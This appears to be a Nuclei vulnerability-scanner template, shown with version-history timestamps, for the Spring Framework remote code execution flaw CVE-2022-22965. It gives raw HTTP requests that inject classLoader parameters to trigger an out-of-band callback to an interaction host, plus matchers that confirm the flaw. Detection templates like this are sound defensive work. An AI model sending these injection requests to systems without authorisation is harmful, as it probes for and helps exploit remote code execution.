nuclei-templates/http/cves/2022/CVE-2022-22965.yaml

60 lines
2.4 KiB
YAML
Raw Normal View History

id: CVE-2022-22965
info:
name: Spring - Remote Code Execution
author: justmumu,arall,dhiyaneshDK,akincibor
severity: critical
2022-08-11 07:04:38 +00:00
description: |
Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-09-06 11:59:08 +00:00
remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
reference:
- https://tanzu.vmware.com/security/cve-2022-22965
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
- https://twitter.com/RandoriAttack/status/1509298490106593283
- https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
- https://twitter.com/_0xf4n9x_/status/1509935429365100546
- https://nvd.nist.gov/vuln/detail/cve-2022-22965
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-22965
cwe-id: CWE-94
2023-10-14 11:27:55 +00:00
epss-score: 0.97484
epss-percentile: 0.99963
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
metadata:
max-request: 4
2023-07-11 19:49:27 +00:00
vendor: vmware
product: spring_framework
tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev
http:
2022-08-09 02:58:38 +00:00
- raw:
- |
POST {{BaseURL}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
2022-08-09 02:58:38 +00:00
class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
2022-08-11 07:04:38 +00:00
2022-08-09 02:58:38 +00:00
payloads:
interact_protocol:
2023-07-11 19:49:27 +00:00
- "http"
2022-08-09 02:58:38 +00:00
- https
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
2022-08-11 07:04:38 +00:00
case-insensitive: true
# digest: 490a0046304402200b2ec156fb34b66a702b4a15fcbd3acff44704371ac4e159cedb2700c8d7108902205121f74d275c2bfec624bfb596b5ce4b0046293163058c6fdd62620a901f6dd0:922c64590222798bb761d5b6d8e72950